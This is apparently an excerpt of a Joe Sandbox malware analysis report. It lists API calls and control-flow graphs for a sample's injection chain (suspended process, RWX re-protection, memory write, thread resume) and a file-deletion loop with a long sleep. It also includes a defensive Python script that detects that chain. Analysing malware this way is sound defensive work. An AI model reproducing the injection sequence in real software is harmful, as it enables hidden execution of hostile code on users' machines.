                                                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                                                • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction ID: 4901e963293465bf77e6bfb6c1d1e3ce31b88732ec8187fb5237d69e5b386d92
                                                                                                                                                                • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction Fuzzy Hash: CBF0F875A00154DBEF12EF24C485A9A7BF8AF84344F4508C8AA4DBF206CA30A599CFA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(02302949,00000008,?,00000000,02302835,00000000), ref: 02302956
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02302993
                                                                                                                                                                • lstrcat.KERNEL32(00000000,023029C1), ref: 023029D0
                                                                                                                                                                • lstrcat.KERNEL32(00000000,023029F8), ref: 02302A07
                                                                                                                                                                • lstrcat.KERNEL32(00000000,02302A2F), ref: 02302A3E
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AB8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02302B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02302B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 675344582-0
                                                                                                                                                                • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction ID: 144425e10782cc472dcfeb7a8a47d99c1872acf732bad165845db566bdb23e1e
                                                                                                                                                                • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction Fuzzy Hash: E65153715002189EDB226F718DDCFAB77BDEF40705F4404A6AE85EA091EE309684CFB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                 • Legend: Executed / Not Executed
                                                                                                                                                                 • Graph (image omitted): entry block 1c292d-1c2943 calls 1c3653, LoadLibraryA and 1c0c9c; block 1c2961-1c2977 loops on itself around VirtualAlloc; blocks 1c29a1-1c2a06 and 1c2a07-1c2a1a build a string with three lstrcat calls; from 1c2a48 onward the function loops, calling DeleteFileA at 1c2a8a, 1c2ace and 1c2b1e, then Sleep at 1c2b34-1c2b48, and returns to 1c2a48
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 675344582-0
                                                                                                                                                                • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                 • Legend: Executed / Not Executed
                                                                                                                                                                 • Graph (image omitted): entry block 23009fd-2300a0c calls 2303677 and CreateProcessA; each following block (GetThreadContext at 2300a12, VirtualProtectEx at 2300a3a, DuplicateHandle at 2300a65, WriteProcessMemory at 2300aa6) either branches to the common exit at 2300b10 or falls through to the next; after ResumeThread at 2300ad4, block 2300ae5-2300b09 calls Sleep and OpenMutexA and either returns at 2300b15 or passes through 2300b0b back to itself or to the exit
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,023009F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02300A04
                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 02300A2C
                                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02300A57
                                                                                                                                                                • DuplicateHandle.KERNEL32(000000FF,000000FF,?,02305834,00000000,00000000,00000002), ref: 02300A9C
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02300ACA
                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 02300ADA
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02300AEA
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02300B01
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 617592159-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: 69dd08cf07fa27ee5703da3eba7b901165e286f08368b27c8da302ae219137ae
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: 86314F316402589FEF269F24CCD5BAA77B8AF04748F4805D4AA49FE0E5DBB0D690CE64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                 • Legend: Executed / Not Executed
                                                                                                                                                                 • Graph (image omitted): entry block 1c09d9-1c09e8 calls 1c3653 and CreateProcessA; each following block (GetThreadContext at 1c09ee, VirtualProtectEx at 1c0a16, DuplicateHandle at 1c0a3c, WriteProcessMemory at 1c0a82) either branches to the common exit at 1c0aec or falls through to the next; after ResumeThread at 1c0ab0, block 1c0ac1-1c0ae5 calls Sleep and OpenMutexA and either returns at 1c0af1 or passes through 1c0ae7 back to itself or to the exit
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 617592159-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%
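The two listings above (dumps 02300000 and 001C0000) record the same CreateProcessA, GetThreadContext, VirtualProtectEx, WriteProcessMemory, ResumeThread chain, with 0xEB bytes re-protected to 0x40 and then written, followed by a Sleep/OpenMutexA wait; the earlier listings record the VirtualAlloc, lstrcat, DeleteFileA, Sleep loop. The Python below is an added example for this page, not Joe Sandbox code and not part of the report: it parses API lines in the report's own "Api.Module(args), ref: addr" notation, flags the suspended-process patching chain, and names the Win32 constants that appear. The argument lists are stack snapshots, so values are mapped to parameters only for APIs whose printed argument count matches the documented prototype; in particular CreateProcessA's creation flags are not decoded, and the chain is recognised from the API order alone (ResumeThread after WriteProcessMemory implies the child was created suspended). The sample traces are copied from the 001C0000 listings on this page.

```python
"""Parse Joe Sandbox 'APIs' lines and flag the create/patch/resume injection chain.

Added example for this report; not Joe Sandbox tooling. Argument lists in the report
are stack snapshots, so values are mapped to parameters only for APIs whose printed
argument count matches the documented Win32 prototype.
"""
import re
from typing import Dict, List, NamedTuple, Optional

# Sample input: API lines copied verbatim from the 001C0000 dump listings on this page.
INJECTION_TRACE = """
• CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
• GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
• VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
• DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
• WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
• ResumeThread.KERNEL32(?), ref: 001C0AB6
• Sleep.KERNEL32(000003E8), ref: 001C0AC6
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
"""
CLEANUP_TRACE = """
• LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
• VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
• lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
"""

# Documented Win32 constants (not taken from the report).
MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
PAGE_READWRITE, PAGE_EXECUTE_READWRITE = 0x04, 0x40
MUTEX_ALL_ACCESS = 0x1F0001
DUPLICATE_SAME_ACCESS = 0x2

API_LINE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")


class Call(NamedTuple):
    api: str
    module: str
    args: List[Optional[int]]  # None where the report printed '?'
    ref: int                   # address of the call site


def parse_api_lines(text: str) -> List[Call]:
    """Extract every 'Api.Module(args), ref: addr' entry, in listing order."""
    calls: List[Call] = []
    for api, module, raw, ref in API_LINE.findall(text):
        fields = [f.strip() for f in raw.split(",") if f.strip()]
        args = [None if f == "?" else int(f, 16) for f in fields]
        calls.append(Call(api, module, args, int(ref, 16)))
    return calls


def decode(call: Call) -> Dict[str, object]:
    """Name the flag values for APIs whose argument count matches the prototype."""
    a = call.args
    if call.api == "VirtualAlloc" and len(a) == 4:
        return {"size": a[1], "commit_reserve": a[2] == (MEM_COMMIT | MEM_RESERVE),
                "rw": a[3] == PAGE_READWRITE, "rwx": a[3] == PAGE_EXECUTE_READWRITE}
    if call.api == "VirtualProtectEx" and len(a) == 5:
        return {"size": a[2], "rwx": a[3] == PAGE_EXECUTE_READWRITE}
    if call.api == "WriteProcessMemory" and len(a) == 5:
        return {"size": a[3]}
    if call.api == "DuplicateHandle" and len(a) == 7:
        return {"same_access": a[6] == DUPLICATE_SAME_ACCESS}
    if call.api == "OpenMutexA" and len(a) == 3:
        return {"all_access": a[0] == MUTEX_ALL_ACCESS}
    if call.api == "Sleep" and a:            # trailing values are stack noise
        return {"ms": a[0]}
    return {}


# Ordered chain that writes into a child and then starts its thread. ResumeThread
# after WriteProcessMemory is what implies the child was created suspended.
INJECTION_CHAIN = ["CreateProcessA", "GetThreadContext", "VirtualProtectEx",
                   "WriteProcessMemory", "ResumeThread"]


def detect_suspended_injection(calls: List[Call]) -> Optional[Dict[str, object]]:
    """Return details of the chain if all five APIs occur in order, else None."""
    hits: List[Call] = []
    for call in calls:
        if len(hits) < len(INJECTION_CHAIN) and call.api == INJECTION_CHAIN[len(hits)]:
            hits.append(call)
    if len(hits) < len(INJECTION_CHAIN):
        return None
    protect, write = decode(hits[2]), decode(hits[3])
    return {"patched_bytes": write["size"],
            "rwx": protect["rwx"],
            "sizes_match": protect["size"] == write["size"],
            "refs": [hex(h.ref) for h in hits]}


if __name__ == "__main__":
    for name, trace in (("injection", INJECTION_TRACE), ("cleanup", CLEANUP_TRACE)):
        calls = parse_api_lines(trace)
        print(name, detect_suspended_injection(calls))
        for c in calls:
            if decode(c):
                print(f"  {c.api} @ {c.ref:08X}: {decode(c)}")
```

Run against the injection listing, the detector reports 0xEB (235) bytes written with matching VirtualProtectEx and WriteProcessMemory sizes and a PAGE_EXECUTE_READWRITE re-protection; against the cleanup listing it reports nothing, while decode() shows the 0x1400000-byte MEM_COMMIT|MEM_RESERVE PAGE_READWRITE allocation and the 0xA012C ms (about 10.9 minute) Sleep inside the DeleteFileA loop.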

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,023029C1), ref: 023029D0
                                                                                                                                                                  • Part of subcall function 02302A01: lstrcat.KERNEL32(00000000,023029F8), ref: 02302A07
                                                                                                                                                                  • Part of subcall function 02302A01: lstrcat.KERNEL32(00000000,02302A2F), ref: 02302A3E
                                                                                                                                                                  • Part of subcall function 02302A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AB8
                                                                                                                                                                  • Part of subcall function 02302A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02302B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02302B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 588723932-0
                                                                                                                                                                • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction ID: 8c7ecd7ef5a995dec9c516901b010c65ee33d8830367745818e3f8d17e473c05
                                                                                                                                                                • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction Fuzzy Hash: 0B4120719002589EDB32AB718DDCEAF77BDEF40704F4044A5AE85EA091EE349684CFB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph
(Rendered as an image in the original report, with blocks marked Executed or Not Executed. The serialized graph is listed below as: block id, address range, operations, successor blocks.)
716 1c29a6-1c2a1a: call 1c3653, lstrcat, call 1c25e8, call 1c29dd, call 1c3653, lstrcat, call 1c2501, call 1c2a14, call 1c3653, lstrcat -> 733
733 1c2a20-1c2a43: call 1c2b4d, call 1c34f7 -> 737
737 1c2a48-1c2a4f -> 733, 738
738 1c2a51-1c2a6d: call 1c343f, call 1c2683 -> 743, 744
743 1c2a6f -> 744, 746
744 1c2a9a-1c2ab1: call 1c2683 -> 749, 750
746 1c2a71-1c2a86: call 1c26f9 -> 744, 754
749 1c2ade-1c2af5: call 1c2683 -> 759, 760
750 1c2ab3 -> 749, 752
752 1c2ab5-1c2aca: call 1c26f9 -> 749, 761
754 1c2a88 -> 744, 755
755 1c2a8a-1c2a94: DeleteFileA -> 744
759 1c2af8-1c2b11: call 1c2e97 -> 765, 766
760 1c2af7 -> 759
761 1c2acc -> 749, 764
764 1c2ace-1c2ad8: DeleteFileA -> 749
765 1c2b34-1c2b48: Sleep -> 737
766 1c2b13-1c2b1c: call 1c3057 -> 765, 769
769 1c2b1e-1c2b2e: DeleteFileA -> 765
APIs
• lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFilelstrcat$Sleep
• String ID:
• API String ID: 588723932-0
• Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
• Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
• Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
(Rendered as an image in the original report, with blocks marked Executed or Not Executed. The serialized graph is listed below as: block id, address range, operations, successor blocks.)
871 2302a01-2302a3e: call 2303677, lstrcat, call 2302525, call 2302a38, call 2303677, lstrcat -> 881
881 2302a44-2302a67: call 2302b71, call 230351b -> 885
885 2302a6c-2302a73 -> 881, 886
886 2302a75-2302a91: call 2303463, call 23026a7 -> 891, 892
891 2302a93 -> 892, 893
892 2302abe-2302ad5: call 23026a7 -> 898, 899
893 2302a95-2302aaa: call 230271d -> 892, 901
898 2302b02-2302b19: call 23026a7 -> 906, 907
899 2302ad7 -> 898, 902
901 2302aac -> 892, 904
902 2302ad9-2302aee: call 230271d -> 898, 909
904 2302aae-2302ab8: DeleteFileA -> 892
906 2302b1b -> 907
907 2302b1c-2302b35: call 2302ebb -> 913, 914
909 2302af0 -> 898, 911
911 2302af2-2302afc: DeleteFileA -> 898
913 2302b37-2302b40: call 230307b -> 914, 917
914 2302b58-2302b6c: Sleep -> 885
917 2302b42-2302b52: DeleteFileA -> 914
APIs
• lstrcat.KERNEL32(00000000,023029F8), ref: 02302A07
  • Part of subcall function 02302A38: lstrcat.KERNEL32(00000000,02302A2F), ref: 02302A3E
  • Part of subcall function 02302A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AB8
  • Part of subcall function 02302A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AFC
  • Part of subcall function 02302A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02302B52
  • Part of subcall function 02302A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02302B66
Memory Dump Source
• Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2300000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction ID: 3e175e7d30369c0d0d8a4c930082b50f36098063354c314ea3957b83ab27736f
• Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction Fuzzy Hash: 56411D719002189EDB226B718DDCFAB76BDEF40709F4044A5AE85EA091EE349684CFB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
(Rendered as an image in the original report, with blocks marked Executed or Not Executed. The serialized graph is listed below as: block id, address range, operations, successor blocks.)
824 1c29dd-1c2a1a: call 1c3653, lstrcat, call 1c2501, call 1c2a14, call 1c3653, lstrcat -> 834
834 1c2a20-1c2a43: call 1c2b4d, call 1c34f7 -> 838
838 1c2a48-1c2a4f -> 834, 839
839 1c2a51-1c2a6d: call 1c343f, call 1c2683 -> 844, 845
844 1c2a6f -> 845, 847
845 1c2a9a-1c2ab1: call 1c2683 -> 850, 851
847 1c2a71-1c2a86: call 1c26f9 -> 845, 855
850 1c2ade-1c2af5: call 1c2683 -> 860, 861
851 1c2ab3 -> 850, 853
853 1c2ab5-1c2aca: call 1c26f9 -> 850, 862
855 1c2a88 -> 845, 856
856 1c2a8a-1c2a94: DeleteFileA -> 845
860 1c2af8-1c2b11: call 1c2e97 -> 866, 867
861 1c2af7 -> 860
862 1c2acc -> 850, 865
865 1c2ace-1c2ad8: DeleteFileA -> 850
866 1c2b34-1c2b48: Sleep -> 838
867 1c2b13-1c2b1c: call 1c3057 -> 866, 870
870 1c2b1e-1c2b2e: DeleteFileA -> 866
APIs
• lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
  • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
  • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFile$lstrcat$Sleep
• String ID:
• API String ID: 4261675396-0
• Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
• Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
• Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,02302A2F), ref: 02302A3E
  • Part of subcall function 02302B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02302C68
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AB8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AFC
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02302B52
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02302B66
Memory Dump Source
• Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2300000_bin.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction ID: 33202c1bde2b1ea95953efc2afed657c70a56840a0e67648284c6b76edbf86ea
• Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
• Instruction Fuzzy Hash: 0F311B719002589EDB226E718DDCFAB76BCEF40709F4044A5AE85EA095EE349680CFB0
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
  • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
• Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
Memory Dump Source
• Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
Similarity
• API ID: DeleteFile$Sleep$lstrcat
• String ID:
• API String ID: 531250245-0
• Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
